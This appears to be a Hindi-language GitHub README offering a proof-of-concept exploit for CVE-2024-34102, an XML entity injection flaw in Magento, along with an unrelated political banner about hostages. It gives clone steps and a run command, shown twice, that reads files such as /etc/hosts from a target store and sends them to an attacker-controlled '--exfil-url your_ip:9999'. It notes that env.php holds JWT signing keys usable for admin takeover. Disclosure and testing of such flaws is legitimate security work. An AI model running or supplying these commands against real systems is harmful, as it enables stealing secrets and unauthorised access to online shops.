
एक PoC प्रदर्शन , Magento में महत्वपूर्ण XML entity injection भेद्यता
हम सभी नागरिकों की सुरक्षित वापसी की माँग करते हैं जिन्हें आतंकवादी समूह हमास ने बंधक बना लिया है। हम तब तक आराम नहीं करेंगे जब तक हर बंधक को रिहा नहीं कर दिया जाता और वे सुरक्षित घर नहीं लौटते। आप उन्हें वापस लाने में मदद कर सकते हैं। https://stories.bringthemhomenow.net/
इस रिपॉजिटरी में Magento में क्रिटिकल XML एंटिटी इंजेक्शन भेद्यता (CVE-2024-34102) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण शामिल है। यह भेद्यता संवेदनशील फ़ाइलों के बहिर्वेशन की अनुमति देती है, जिसका फिर Magento के प्रशासनिक कार्यक्षमताओं तक अनधिकृत पहुँच प्राप्त करने के लिए लाभ उठाया जा सकता है। यह शोषण शैक्षिक उद्देश्यों के लिए डिज़ाइन किया गया है और इसका उपयोग जिम्मेदारी से किया जाना चाहिए।
Magento दुनिया भर में उपयोग किए जाने वाले सबसे लोकप्रिय ई-कॉमर्स समाधानों में से एक है। जून 2024 में, CVE-2024-34102 के रूप में पहचानी गई एक क्रिटिकल प्री-ऑथेंटिकेशन XML एंटिटी इंजेक्शन समस्या का पता चला था। यह भेद्यता गंभीर परिणामों को जन्म दे सकती है, जिसमें Magento से app/etc/env.php फ़ाइल का बहिर्वेशन शामिल है, जिसमें JWTs पर हस्ताक्षर करने के लिए उपयोग की जाने वाली क्रिप्टोग्राफ़िक कुंजियाँ होती हैं।
requests लाइब्रेरी (pip install requests)रिपॉजिटरी क्लोन करें:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
आवश्यक तर्कों के साथ स्क्रिप्ट निष्पादित करें:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: लक्ष्य Magento इंस्टेंस का URL।--target-file: लक्ष्य सर्वर पर बहिर्वेशित करने का फ़ाइल पथ।--exfil-url: बहिर्वेशित डेटा प्राप्त करने का URL।python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999